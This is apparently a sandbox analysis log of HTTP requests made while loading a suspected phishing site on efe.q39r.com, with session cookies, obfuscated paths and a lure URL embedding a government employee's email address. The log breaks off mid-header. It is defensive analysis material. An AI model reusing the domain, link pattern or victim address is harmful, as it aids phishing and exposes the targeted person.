      Source: global trafficHTTP traffic detected: GET /efe/ HTTP/1.1Host: efe.q39r.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpkKzB1R3RuTkNrTlkvMTdHL0hkL0E9PSIsInZhbHVlIjoiOEYvZEkyeHZHREhpTmZNSHFOREJaUGJzdnN4R080R3cvMXMvMVpWYmt1K3RaUmN4d0FkMUVGUURjM3N5VXQvVzYxMk9Vb1FRZG9yTHBYUllISjdQWWdKN0d2Y3p4WWYwVnJCSkgrWUZSSk4ycENobElmdUdzS0pSL0NkbEFZWHAiLCJtYWMiOiI0YTc3M2MwMTU5MjNjZWMxMmEyMWNiZWJlMDQ5YjQ1MzMwNjY0ZTE2MTVmZWFkNDRiMGExNzhmZDYzZTllNWY1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktFODFBSUdIaHJYVWhneVo5bUo1a0E9PSIsInZhbHVlIjoiek1jU3VTT0VHcGE4VUxvbGxxanpKcjNDS2tOYjF2aWRtTlgydTB0dUpkSnIvTHFib0Jub2pJWnVxcjZFUGV3YzFqdnNJZkF5c1pnZ2Q0cGhxaFVleFZGRzcxZlkrdG5GSVMzYXhIQzM1c3RkVTI3RXRSMEkvS0F6VVpKell5MWIiLCJtYWMiOiIzMjY3NDYwYjI5NjhmZmU0MTM4ODUxNmM5MjY2N2UwMDAxYmY5ODkzNTExY2E1NWZjMDQyZjc5ZjIxNWZkNDAyIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /clKkFwlBHiHVSJ8Pe6bssjJAax4UIk5BlbqZlpC0mNq48 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpkKzB1R3RuTkNrTlkvMTdHL0hkL0E9PSIsInZhbHVlIjoiOEYvZEkyeHZHREhpTmZNSHFOREJaUGJzdnN4R080R3cvMXMvMVpWYmt1K3RaUmN4d0FkMUVGUURjM3N5VXQvVzYxMk9Vb1FRZG9yTHBYUllISjdQWWdKN0d2Y3p4WWYwVnJCSkgrWUZSSk4ycENobElmdUdzS0pSL0NkbEFZWHAiLCJtYWMiOiI0YTc3M2MwMTU5MjNjZWMxMmEyMWNiZWJlMDQ5YjQ1MzMwNjY0ZTE2MTVmZWFkNDRiMGExNzhmZDYzZTllNWY1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktFODFBSUdIaHJYVWhneVo5bUo1a0E9PSIsInZhbHVlIjoiek1jU3VTT0VHcGE4VUxvbGxxanpKcjNDS2tOYjF2aWRtTlgydTB0dUpkSnIvTHFib0Jub2pJWnVxcjZFUGV3YzFqdnNJZkF5c1pnZ2Q0cGhxaFVleFZGRzcxZlkrdG5GSVMzYXhIQzM1c3RkVTI3RXRSMEkvS0F6VVpKell5MWIiLCJtYWMiOiIzMjY3NDYwYjI5NjhmZmU0MTM4ODUxNmM5MjY2N2UwMDAxYmY5ODkzNTExY2E1NWZjMDQyZjc5ZjIxNWZkNDAyIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /efe/?xXmaria.wojciechowski@co.monmouth.nj.us HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InpTcm9QdUpMMjAwRzQ4MUZzNmZsT2c9PSIsInZhbHVlIjoiZGNNNmIyQnd2M1N2RWh3WFZOdlhlQW1VSDZGUHFjK0ZmZ21HdzlKSk10UFJTcVVkVlp5ZGJEUEczeWNDSzdRb05uM3g0UExtbktqaE1FekkySmdqaXE0NzQ1VlM4Rld3TXRWYVR1dzNNUUZCdm9TZzNLSnlJNE9VUHZoMEVrYmUiLCJtYWMiOiIyOWUxNDFmNGJiNzhhYzU1ZGZmMmIzMDA4MGEyMTc3ZTAwYmIzNTcyYTU3MTUzYWU1YTdhMGQyZGQyNWIxY2NlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im1iOUJZTEJIUjI5RzRkR2pOYkxGK3c9PSIsInZhbHVlIjoiTlFrK01nU2xGN2dST1RlWmNkdVlHRU00S3N1Mmg4S1BDa1N4RmlPQlY4WVFMZmp0SWpzdm5Wd2RmK2pOcWhTL0F5NFE0NVBFQjkxL0FxU3ZreTRhNTF2MExQT2Z5YmZQbjJMcFdnYUlyVUtmUVAvUjJDc1Nucmw3ak9VVzVERkEiLCJtYWMiOiJmMzcyOGQzOTgyYTFmNzkwYjJhMDIyMjFhNjFhMTIwZjY4MjI4MDMwZWYyN2JlNzhlNzEyOTEyZjY0ODE3Yzc3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://efe.q39r.com/efe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNVbGFybGt1NFBzbWhMY3lGNmZURlE9PSIsInZhbHVlIjoiRWRCVm8yM0pBVUlGWkhjdEovQmtsZHpsN3dkYytMdXVVOUhBRkFBcXE4RnMyM05VRno1WUh4MjVNdlN5R0tJSlZSYmdsb2Q5MTNVcjhSVmlMRGNrT0tzR0ViSm1uN2toV0hXQ2VWVVRCODkyV2JsUWFuVEQrcnREbDU5TUFWUGciLCJtYWMiOiJhNTc4ODMyM2ViNjRlM2E2OTJiNDlkZjZmNzAzMzI5N2FiNjg5NmE1MWE4ZGQ4ZTFkMGU5Y2NkNDcwMjIwZWIxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjBKUDRCd1RZbzdtSHIyUFNMOExIYXc9PSIsInZhbHVlIjoienJzeWFYekUwbXBpRlhXL3JmRHY5YmhEVXl2MWN3MHYvNjZNU0xOWU42Vld3OHlRRUwyKzBNSDA2ZmhCU3h4ZWk0KzVSdGs1cFA1VWdJK1lQRlhvbFBUc3JTRUxYQlNHdHV5a3cxTVBtTjc5Kys0ZHFzWDdTa25OY215YTgya1YiLCJtYWMiOiI2NGQ2NmM1MzAwYzNmYzdlZTQ4Zjk5ZDMyOTc2MmViNzU1YjVlNjhmYjFjMzJjNjdiZjBjMDQ3NzJkY2VhYzg3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /34fI8EabNdid6714 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /abx86uorshef28 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /pq6n4pZVF34fr6WWmmuv39 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /12YCk90LK56Se1ynKqr42 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /56wgt99Sy67foh23sxX40uDyhst60 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /23Y1SlAfZUj5ab3gLTPxy70 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlKHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /90XMoG7YJNQ48AE7R9RefBV2W3ZP0TRtab71 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /efIbTPq3F3E9M4tIsfj78N3gmAo2XLQkl100 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://efe.q39r.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /345AebFBkUb4itsJp2dEx9Nz1WrklGGnhP4AVwQmYV89110 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 